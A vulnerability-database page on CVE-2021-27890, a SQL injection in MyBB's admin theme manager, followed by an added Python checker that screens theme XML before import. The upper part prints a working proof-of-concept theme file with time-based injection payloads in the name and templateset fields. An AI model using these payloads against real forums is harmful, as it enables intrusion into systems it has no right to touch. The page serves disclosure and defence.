
CVE-2021-27890 MyBB Admin Control Panel Theme Management SQL Injection Vulnerability

A free, open vulnerability database that anyone can edit -- pwnwiki.com


Affected Versions

< 1.8.26

Exploit

Import the following crafted XML theme file in the backend theme manager:

<?xml version="1.0" encoding="UTF-8"?>
<theme name="1' and sleep(10) and '" version="1825">
<properties>
<templateset>-2' or sleep(0.01) or '</templateset>
<editortheme><![CDATA[mybb.css]]></editortheme>
<imgdir><![CDATA[images]]></imgdir>
<logo><![CDATA[images/logo.png]]></logo>
<tablespace><![CDATA[5]]></tablespace>
<borderwidth><![CDATA[0]]></borderwidth>
<color><![CDATA[]]></color>
<disporder><![CDATA[a:7:{s:10:"global.css";i:1;s:10:"usercp.css";i:2;s:9:"modcp.css";i:3;s:16:"star_ratings.css";i:4;s:14:"showthread.css";i:5;s:17:"thread_status.css";i:6;s:8:"css3.css";i:7;}]]></disporder>
</properties>
<stylesheets>
</stylesheets>
<templates>
</templates>
</theme>

Click "Duplicate Theme" and capture the traffic: the response is delayed, which confirms the time-based (delayed) injection. The same injection also exists in the export function.
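For installations that cannot move off the affected versions (< 1.8.26) immediately, theme files can be screened before an administrator imports them. The following is an added example, not code from the original page or from MyBB: it flags the two fields that carry the payload in the sample above. The function name, the sample constants and the rule that templateset must be an integer id are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET

# Assumption: templateset holds a numeric template-set id (negative ids allowed).
INT_RE = re.compile(r"-?\d+")
# Quote and backslash characters are what break out of a SQL string literal.
QUOTE_RE = re.compile(r"['\"\\]")

def audit_theme_xml(xml_text):
    """Return (field, value, reason) findings for a theme file before import."""
    if "<!DOCTYPE" in xml_text.upper():
        return [("document", "", "DOCTYPE is not expected in a theme file")]
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError as exc:
        return [("document", "", f"not well-formed XML: {exc}")]
    if root.tag != "theme":
        return [("document", root.tag, "root element is not <theme>")]

    findings = []
    name = root.get("name", "")
    if QUOTE_RE.search(name):
        findings.append(("theme@name", name, "quote or backslash in theme name"))
    version = root.get("version", "")
    if not version.isdigit():
        findings.append(("theme@version", version, "version is not numeric"))
    templateset = root.findtext("properties/templateset")
    if templateset is not None and not INT_RE.fullmatch(templateset.strip()):
        findings.append(("properties/templateset", templateset, "not an integer id"))
    return findings

# Constructed samples: the first reuses the two field values shown on this page.
SAMPLE_FROM_PAGE = """<?xml version="1.0" encoding="UTF-8"?>
<theme name="1' and sleep(10) and '" version="1825">
<properties>
<templateset>-2' or sleep(0.01) or '</templateset>
<imgdir><![CDATA[images]]></imgdir>
</properties>
</theme>"""
SAMPLE_BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<theme name="Default Blue" version="1825">
<properties><templateset>1</templateset></properties>
</theme>"""

if __name__ == "__main__":
    for label, doc in (("page sample", SAMPLE_FROM_PAGE), ("benign", SAMPLE_BENIGN)):
        print(label, audit_theme_xml(doc))
```

A theme name with a legitimate apostrophe will also be flagged, so treat a finding as a prompt for manual review; the check does not replace upgrading.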
